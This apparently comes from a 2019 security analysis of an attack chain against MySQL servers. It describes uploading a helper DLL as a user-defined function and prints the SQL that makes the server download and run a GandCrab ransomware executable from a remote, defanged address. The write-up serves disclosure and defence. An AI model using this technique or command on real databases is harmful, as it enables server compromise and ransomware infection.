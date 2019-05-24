The attackers attempt to connect to the database server and establish that it is running a MySQL instance.

Then, the attacker uses the "set" command to upload all the bytes composing the helper DLL into memory in a variable and wrote out the contents of that variable to a database table named yongger2.

The attacker concatenates the bytes into one file and drops them into the server's plugin directory. The analysis of the DLL revealed it is used to add the xpdl3, xpdl3_deinit, and xpdl3_init functions to the database.

The attacker then drops the yongger2 table and the function xpdl3, if one already exists. At this point the attacker uses the following SQL command to create a database function (also named xpdl3) that is used to invoke the DLL:

CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'

The command to invoke the xpdl3 function is:

select xpdl3('hxxp://172.96.14.134:5471/3306-1[.]exe','c:\\isetup.exe')

Using this attack scheme, the attacker instructs the database server to download the GandCrab payload from the remote machine and drops it in the root of the C: drive with the name isetup.exe and executes it.